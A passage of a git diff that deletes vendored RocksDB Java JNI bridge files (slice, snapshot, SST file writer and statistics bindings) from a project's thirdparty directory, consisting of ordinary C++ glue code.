-jlong Java_org_rocksdb_RocksDB_getUpdatesSince(JNIEnv* env,
-    jobject jdb, jlong jdb_handle, jlong jsequence_number) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::SequenceNumber sequence_number =
-      static_cast<rocksdb::SequenceNumber>(jsequence_number);
-  std::unique_ptr<rocksdb::TransactionLogIterator> iter;
-  rocksdb::Status s = db->GetUpdatesSince(sequence_number, &iter);
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(iter.release());
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  return 0;
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    setOptions
- * Signature: (JJ[Ljava/lang/String;[Ljava/lang/String;)V
- */
-void Java_org_rocksdb_RocksDB_setOptions(JNIEnv* env, jobject jdb,
-    jlong jdb_handle, jlong jcf_handle, jobjectArray jkeys,
-    jobjectArray jvalues) {
-  const jsize len = env->GetArrayLength(jkeys);
-  assert(len == env->GetArrayLength(jvalues));
-
-  std::unordered_map<std::string, std::string> options_map;
-  for (jsize i = 0; i < len; i++) {
-    jobject jobj_key = env->GetObjectArrayElement(jkeys, i);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      return;
-    }
-
-    jobject jobj_value = env->GetObjectArrayElement(jvalues, i);
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jobj_key);
-      return;
-    }
-
-    jstring jkey = reinterpret_cast<jstring>(jobj_key);
-    jstring jval = reinterpret_cast<jstring>(jobj_value);
-
-    const char* key = env->GetStringUTFChars(jkey, nullptr);
-    if(key == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->DeleteLocalRef(jobj_value);
-      env->DeleteLocalRef(jobj_key);
-      return;
-    }
-
-    const char* value = env->GetStringUTFChars(jval, nullptr);
-    if(value == nullptr) {
-      // exception thrown: OutOfMemoryError
-      env->ReleaseStringUTFChars(jkey, key);
-      env->DeleteLocalRef(jobj_value);
-      env->DeleteLocalRef(jobj_key);
-      return;
-    }
-
-    std::string s_key(key);
-    std::string s_value(value);
-    options_map[s_key] = s_value;
-
-    env->ReleaseStringUTFChars(jkey, key);
-    env->ReleaseStringUTFChars(jval, value);
-    env->DeleteLocalRef(jobj_key);
-    env->DeleteLocalRef(jobj_value);
-  }
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  db->SetOptions(cf_handle, options_map);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::IngestExternalFile
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    ingestExternalFile
- * Signature: (JJ[Ljava/lang/String;IJ)V
- */
-void Java_org_rocksdb_RocksDB_ingestExternalFile(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jcf_handle,
-    jobjectArray jfile_path_list, jint jfile_path_list_len,
-    jlong jingest_external_file_options_handle) {
-  jboolean has_exception = JNI_FALSE;
-  std::vector<std::string> file_path_list =
-      rocksdb::JniUtil::copyStrings(env, jfile_path_list, jfile_path_list_len,
-          &has_exception);
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    return;
-  }
-
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* column_family =
-      reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* ifo =
-      reinterpret_cast<rocksdb::IngestExternalFileOptions*>(
-          jingest_external_file_options_handle);
-  rocksdb::Status s =
-      db->IngestExternalFile(column_family, file_path_list, *ifo);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/slice.cc b/thirdparty/rocksdb/java/rocksjni/slice.cc
deleted file mode 100644
index ef0e384..0000000
--- a/thirdparty/rocksdb/java/rocksjni/slice.cc
+++ /dev/null
@@ -1,349 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::Slice.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_AbstractSlice.h"
-#include "include/org_rocksdb_Slice.h"
-#include "include/org_rocksdb_DirectSlice.h"
-#include "rocksdb/slice.h"
-#include "rocksjni/portal.h"
-
-// <editor-fold desc="org.rocksdb.AbstractSlice>
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    createNewSliceFromString
- * Signature: (Ljava/lang/String;)J
- */
-jlong Java_org_rocksdb_AbstractSlice_createNewSliceFromString(
-    JNIEnv * env, jclass jcls, jstring jstr) {
-  const auto* str = env->GetStringUTFChars(jstr, nullptr);
-  if(str == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  const size_t len = strlen(str);
-
-  // NOTE: buf will be deleted in the
-  // Java_org_rocksdb_Slice_disposeInternalBuf or
-  // or Java_org_rocksdb_DirectSlice_disposeInternalBuf methods
-  char* buf = new char[len + 1];
-  memcpy(buf, str, len);
-  buf[len] = 0;
-  env->ReleaseStringUTFChars(jstr, str);
-
-  const auto* slice = new rocksdb::Slice(buf);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    size0
- * Signature: (J)I
- */
-jint Java_org_rocksdb_AbstractSlice_size0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return static_cast<jint>(slice->size());
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    empty0
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_AbstractSlice_empty0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return slice->empty();
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    toString0
- * Signature: (JZ)Ljava/lang/String;
- */
-jstring Java_org_rocksdb_AbstractSlice_toString0(
-    JNIEnv* env, jobject jobj, jlong handle, jboolean hex) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const std::string s = slice->ToString(hex);
-  return env->NewStringUTF(s.c_str());
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    compare0
- * Signature: (JJ)I;
- */
-jint Java_org_rocksdb_AbstractSlice_compare0(
-    JNIEnv* env, jobject jobj, jlong handle, jlong otherHandle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const auto* otherSlice =
-    reinterpret_cast<rocksdb::Slice*>(otherHandle);
-  return slice->compare(*otherSlice);
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    startsWith0
- * Signature: (JJ)Z;
- */
-jboolean Java_org_rocksdb_AbstractSlice_startsWith0(
-    JNIEnv* env, jobject jobj, jlong handle, jlong otherHandle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const auto* otherSlice =
-    reinterpret_cast<rocksdb::Slice*>(otherHandle);
-  return slice->starts_with(*otherSlice);
-}
-
-/*
- * Class:     org_rocksdb_AbstractSlice
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_AbstractSlice_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  delete reinterpret_cast<rocksdb::Slice*>(handle);
-}
-
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.Slice>
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    createNewSlice0
- * Signature: ([BI)J
- */
-jlong Java_org_rocksdb_Slice_createNewSlice0(
-    JNIEnv * env, jclass jcls, jbyteArray data, jint offset) {
-  const jsize dataSize = env->GetArrayLength(data);
-  const int len = dataSize - offset;
-
-  // NOTE: buf will be deleted in the Java_org_rocksdb_Slice_disposeInternalBuf method
-  jbyte* buf = new jbyte[len];
-  env->GetByteArrayRegion(data, offset, len, buf);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    return 0;
-  }
-
-  const auto* slice = new rocksdb::Slice((const char*)buf, len);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    createNewSlice1
- * Signature: ([B)J
- */
-jlong Java_org_rocksdb_Slice_createNewSlice1(
-    JNIEnv * env, jclass jcls, jbyteArray data) {
-  jbyte* ptrData = env->GetByteArrayElements(data, nullptr);
-  if(ptrData == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-  const int len = env->GetArrayLength(data) + 1;
-
-  // NOTE: buf will be deleted in the Java_org_rocksdb_Slice_disposeInternalBuf method
-  char* buf = new char[len];
-  memcpy(buf, ptrData, len - 1);
-  buf[len-1] = '\0';
-
-  const auto* slice =
-      new rocksdb::Slice(buf, len - 1);
-
-  env->ReleaseByteArrayElements(data, ptrData, JNI_ABORT);
-
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    data0
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_Slice_data0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const jsize len = static_cast<jsize>(slice->size());
-  const jbyteArray data = env->NewByteArray(len);
-  if(data == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-  
-  env->SetByteArrayRegion(data, 0, len,
-    const_cast<jbyte*>(reinterpret_cast<const jbyte*>(slice->data())));
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    env->DeleteLocalRef(data);
-    return nullptr;
-  }
-
-  return data;
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    clear0
- * Signature: (JZJ)V
- */
-void Java_org_rocksdb_Slice_clear0(
-    JNIEnv * env, jobject jobj, jlong handle, jboolean shouldRelease,
-    jlong internalBufferOffset) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  if(shouldRelease == JNI_TRUE) {
-    const char* buf = slice->data_ - internalBufferOffset;
-    delete [] buf;
-  }
-  slice->clear();
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    removePrefix0
- * Signature: (JI)V
- */
-void Java_org_rocksdb_Slice_removePrefix0(
-    JNIEnv * env, jobject jobj, jlong handle, jint length) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  slice->remove_prefix(length);
-}
-
-/*
- * Class:     org_rocksdb_Slice
- * Method:    disposeInternalBuf
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_Slice_disposeInternalBuf(
-    JNIEnv * env, jobject jobj, jlong handle, jlong internalBufferOffset) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const char* buf = slice->data_ - internalBufferOffset;
-  delete [] buf;
-}
-
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.DirectSlice>
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    createNewDirectSlice0
- * Signature: (Ljava/nio/ByteBuffer;I)J
- */
-jlong Java_org_rocksdb_DirectSlice_createNewDirectSlice0(
-    JNIEnv* env, jclass jcls, jobject data, jint length) {
-  assert(data != nullptr);
-  void* data_addr = env->GetDirectBufferAddress(data);
-  if(data_addr == nullptr) {
-    // error: memory region is undefined, given object is not a direct
-    // java.nio.Buffer, or JNI access to direct buffers is not supported by JVM
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument(
-            "Could not access DirectBuffer"));
-    return 0;
-  }
-
-  const auto* ptrData =
-     reinterpret_cast<char*>(data_addr);
-  const auto* slice = new rocksdb::Slice(ptrData, length);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    createNewDirectSlice1
- * Signature: (Ljava/nio/ByteBuffer;)J
- */
-jlong Java_org_rocksdb_DirectSlice_createNewDirectSlice1(
-    JNIEnv* env, jclass jcls, jobject data) {
-  void* data_addr = env->GetDirectBufferAddress(data);
-  if(data_addr == nullptr) {
-    // error: memory region is undefined, given object is not a direct
-    // java.nio.Buffer, or JNI access to direct buffers is not supported by JVM
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument(
-            "Could not access DirectBuffer"));
-    return 0;
-  }
-
-  const auto* ptrData = reinterpret_cast<char*>(data_addr);
-  const auto* slice = new rocksdb::Slice(ptrData);
-  return reinterpret_cast<jlong>(slice);
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    data0
- * Signature: (J)Ljava/lang/Object;
- */
-jobject Java_org_rocksdb_DirectSlice_data0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return env->NewDirectByteBuffer(const_cast<char*>(slice->data()),
-    slice->size());
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    get0
- * Signature: (JI)B
- */
-jbyte Java_org_rocksdb_DirectSlice_get0(
-    JNIEnv* env, jobject jobj, jlong handle, jint offset) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  return (*slice)[offset];
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    clear0
- * Signature: (JZJ)V
- */
-void Java_org_rocksdb_DirectSlice_clear0(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jboolean shouldRelease, jlong internalBufferOffset) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  if(shouldRelease == JNI_TRUE) {
-    const char* buf = slice->data_ - internalBufferOffset;
-    delete [] buf;
-  }
-  slice->clear();
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    removePrefix0
- * Signature: (JI)V
- */
-void Java_org_rocksdb_DirectSlice_removePrefix0(
-    JNIEnv* env, jobject jobj, jlong handle, jint length) {
-  auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  slice->remove_prefix(length);
-}
-
-/*
- * Class:     org_rocksdb_DirectSlice
- * Method:    disposeInternalBuf
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_DirectSlice_disposeInternalBuf(
-    JNIEnv* env, jobject jobj, jlong handle, jlong internalBufferOffset) {
-  const auto* slice = reinterpret_cast<rocksdb::Slice*>(handle);
-  const char* buf = slice->data_ - internalBufferOffset;
-  delete [] buf;
-}
-
-// </editor-fold>
diff --git a/thirdparty/rocksdb/java/rocksjni/snapshot.cc b/thirdparty/rocksdb/java/rocksjni/snapshot.cc
deleted file mode 100644
index 04a0ebf..0000000
--- a/thirdparty/rocksdb/java/rocksjni/snapshot.cc
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-
-#include "include/org_rocksdb_Snapshot.h"
-#include "rocksdb/db.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_Snapshot
- * Method:    getSequenceNumber
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Snapshot_getSequenceNumber(JNIEnv* env,
-    jobject jobj, jlong jsnapshot_handle) {
-  auto* snapshot = reinterpret_cast<rocksdb::Snapshot*>(
-      jsnapshot_handle);
-  return snapshot->GetSequenceNumber();
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/sst_file_writerjni.cc b/thirdparty/rocksdb/java/rocksjni/sst_file_writerjni.cc
deleted file mode 100644
index ceb9338..0000000
--- a/thirdparty/rocksdb/java/rocksjni/sst_file_writerjni.cc
+++ /dev/null
@@ -1,248 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::SstFileWriter methods
-// from Java side.
-
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_SstFileWriter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/sst_file_writer.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    newSstFileWriter
- * Signature: (JJJ)J
- */
-jlong Java_org_rocksdb_SstFileWriter_newSstFileWriter__JJJ(JNIEnv *env, jclass jcls,
-                                                      jlong jenvoptions,
-                                                      jlong joptions,
-                                                      jlong jcomparator) {
-  auto *env_options =
-      reinterpret_cast<const rocksdb::EnvOptions *>(jenvoptions);
-  auto *options = reinterpret_cast<const rocksdb::Options *>(joptions);
-  auto *comparator = reinterpret_cast<const rocksdb::Comparator *>(jcomparator);
-  rocksdb::SstFileWriter *sst_file_writer =
-      new rocksdb::SstFileWriter(*env_options, *options, comparator);
-  return reinterpret_cast<jlong>(sst_file_writer);
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    newSstFileWriter
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_SstFileWriter_newSstFileWriter__JJ(JNIEnv *env, jclass jcls,
-                                                      jlong jenvoptions,
-                                                      jlong joptions) {
-  auto *env_options =
-      reinterpret_cast<const rocksdb::EnvOptions *>(jenvoptions);
-  auto *options = reinterpret_cast<const rocksdb::Options *>(joptions);
-  rocksdb::SstFileWriter *sst_file_writer =
-      new rocksdb::SstFileWriter(*env_options, *options);
-  return reinterpret_cast<jlong>(sst_file_writer);
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    open
- * Signature: (JLjava/lang/String;)V
- */
-void Java_org_rocksdb_SstFileWriter_open(JNIEnv *env, jobject jobj,
-                                         jlong jhandle, jstring jfile_path) {
-  const char *file_path = env->GetStringUTFChars(jfile_path, nullptr);
-  if(file_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Status s =
-      reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Open(file_path);
-  env->ReleaseStringUTFChars(jfile_path, file_path);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    put
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_SstFileWriter_put__JJJ(JNIEnv *env, jobject jobj,
-                                             jlong jhandle, jlong jkey_handle,
-                                             jlong jvalue_handle) {
-  auto *key_slice = reinterpret_cast<rocksdb::Slice *>(jkey_handle);
-  auto *value_slice = reinterpret_cast<rocksdb::Slice *>(jvalue_handle);
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Put(*key_slice,
-                                                             *value_slice);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    put
- * Signature: (JJJ)V
- */
- void Java_org_rocksdb_SstFileWriter_put__J_3B_3B(JNIEnv *env, jobject jobj,
-                                                  jlong jhandle, jbyteArray jkey,
-                                                  jbyteArray jval) {
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key),  env->GetArrayLength(jkey));
-
-  jbyte* value = env->GetByteArrayElements(jval, nullptr);
-  if(value == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-    return;
-  }
-  rocksdb::Slice value_slice(
-      reinterpret_cast<char*>(value),  env->GetArrayLength(jval));
-
-  rocksdb::Status s =
-  reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Put(key_slice,
-                                                           value_slice);
-
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-  env->ReleaseByteArrayElements(jval, value, JNI_ABORT);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    merge
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_SstFileWriter_merge__JJJ(JNIEnv *env, jobject jobj,
-                                               jlong jhandle, jlong jkey_handle,
-                                               jlong jvalue_handle) {
-  auto *key_slice = reinterpret_cast<rocksdb::Slice *>(jkey_handle);
-  auto *value_slice = reinterpret_cast<rocksdb::Slice *>(jvalue_handle);
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Merge(*key_slice,
-                                                               *value_slice);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    merge
- * Signature: (J[B[B)V
- */
-void Java_org_rocksdb_SstFileWriter_merge__J_3B_3B(JNIEnv *env, jobject jobj,
-                                                   jlong jhandle, jbyteArray jkey,
-                                                   jbyteArray jval) {
-
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key),  env->GetArrayLength(jkey));
-
-  jbyte* value = env->GetByteArrayElements(jval, nullptr);
-  if(value == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-    return;
-  }
-  rocksdb::Slice value_slice(
-      reinterpret_cast<char*>(value),  env->GetArrayLength(jval));
-
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Merge(key_slice,
-                                                               value_slice);
-
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-  env->ReleaseByteArrayElements(jval, value, JNI_ABORT);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    delete
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_SstFileWriter_delete__J_3B(JNIEnv *env, jobject jobj,
-                                               jlong jhandle, jbyteArray jkey) {
-  jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-  if(key == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-  rocksdb::Slice key_slice(
-      reinterpret_cast<char*>(key),  env->GetArrayLength(jkey));
-
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Delete(key_slice);
-
-  env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    delete
- * Signature: (JJJ)V
- */
- void Java_org_rocksdb_SstFileWriter_delete__JJ(JNIEnv *env, jobject jobj,
-  jlong jhandle, jlong jkey_handle) {
-  auto *key_slice = reinterpret_cast<rocksdb::Slice *>(jkey_handle);
-  rocksdb::Status s =
-    reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Delete(*key_slice);
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    finish
- * Signature: (J)V
- */
-void Java_org_rocksdb_SstFileWriter_finish(JNIEnv *env, jobject jobj,
-                                           jlong jhandle) {
-  rocksdb::Status s =
-      reinterpret_cast<rocksdb::SstFileWriter *>(jhandle)->Finish();
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_SstFileWriter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_SstFileWriter_disposeInternal(JNIEnv *env, jobject jobj,
-                                                    jlong jhandle) {
-  delete reinterpret_cast<rocksdb::SstFileWriter *>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/statistics.cc b/thirdparty/rocksdb/java/rocksjni/statistics.cc
deleted file mode 100644
index 7b657ad..0000000
--- a/thirdparty/rocksdb/java/rocksjni/statistics.cc
+++ /dev/null
@@ -1,244 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Statistics methods from Java side.
-
-#include <jni.h>
-#include <memory>
-#include <set>
-
-#include "include/org_rocksdb_Statistics.h"
-#include "rocksjni/portal.h"
-#include "rocksjni/statisticsjni.h"
-#include "rocksdb/statistics.h"
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics__(JNIEnv* env, jclass jcls) {
-  return Java_org_rocksdb_Statistics_newStatistics___3BJ(
-      env, jcls, nullptr, 0);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics__J(
-    JNIEnv* env, jclass jcls, jlong jother_statistics_handle) {
-  return Java_org_rocksdb_Statistics_newStatistics___3BJ(
-      env, jcls, nullptr, jother_statistics_handle);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: ([B)J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics___3B(
-    JNIEnv* env, jclass jcls, jbyteArray jhistograms) {
-  return Java_org_rocksdb_Statistics_newStatistics___3BJ(
-      env, jcls, jhistograms, 0);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    newStatistics
- * Signature: ([BJ)J
- */
-jlong Java_org_rocksdb_Statistics_newStatistics___3BJ(
-    JNIEnv* env, jclass jcls, jbyteArray jhistograms,
-    jlong jother_statistics_handle) {
-
-  std::shared_ptr<rocksdb::Statistics>* pSptr_other_statistics = nullptr;
-  if (jother_statistics_handle > 0) {
-    pSptr_other_statistics =
-        reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(
-            jother_statistics_handle);
-  }
-
-  std::set<uint32_t> histograms;
-  if (jhistograms != nullptr) {
-    const jsize len = env->GetArrayLength(jhistograms);
-    if (len > 0) {
-      jbyte* jhistogram = env->GetByteArrayElements(jhistograms, nullptr);
-      if (jhistogram == nullptr ) {
-        // exception thrown: OutOfMemoryError
-        return 0;
-      }
-
-      for (jsize i = 0; i < len; i++) {
-        const rocksdb::Histograms histogram =
-            rocksdb::HistogramTypeJni::toCppHistograms(jhistogram[i]);
-        histograms.emplace(histogram);
-      }
-
-      env->ReleaseByteArrayElements(jhistograms, jhistogram, JNI_ABORT);
-    }
-  }
-
-  std::shared_ptr<rocksdb::Statistics> sptr_other_statistics = nullptr;
-  if (pSptr_other_statistics != nullptr) {
-      sptr_other_statistics =   *pSptr_other_statistics;
-  }
-
-  auto* pSptr_statistics = new std::shared_ptr<rocksdb::StatisticsJni>(
-      new rocksdb::StatisticsJni(sptr_other_statistics, histograms));
-
-  return reinterpret_cast<jlong>(pSptr_statistics);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_Statistics_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  if(jhandle > 0) {
-    auto* pSptr_statistics =
-        reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-    delete pSptr_statistics;
-  }
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    statsLevel
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_Statistics_statsLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  return rocksdb::StatsLevelJni::toJavaStatsLevel(pSptr_statistics->get()->stats_level_);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    setStatsLevel
- * Signature: (JB)V
- */
-void Java_org_rocksdb_Statistics_setStatsLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jstats_level) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto stats_level = rocksdb::StatsLevelJni::toCppStatsLevel(jstats_level);
-  pSptr_statistics->get()->stats_level_ = stats_level;
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getTickerCount
- * Signature: (JB)J
- */
-jlong Java_org_rocksdb_Statistics_getTickerCount(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jticker_type) {
-  auto* pSptr_statistics =
-      reinterpret_cast<std::shared_ptr<rocksdb::Statistics>*>(jhandle);
-  assert(pSptr_statistics != nullptr);
-  auto ticker = rocksdb::TickerTypeJni::toCppTickers(jticker_type);
-  return pSptr_statistics->get()->getTickerCount(ticker);
-}
-
-/*
- * Class:     org_rocksdb_Statistics
- * Method:    getAndResetTickerCount
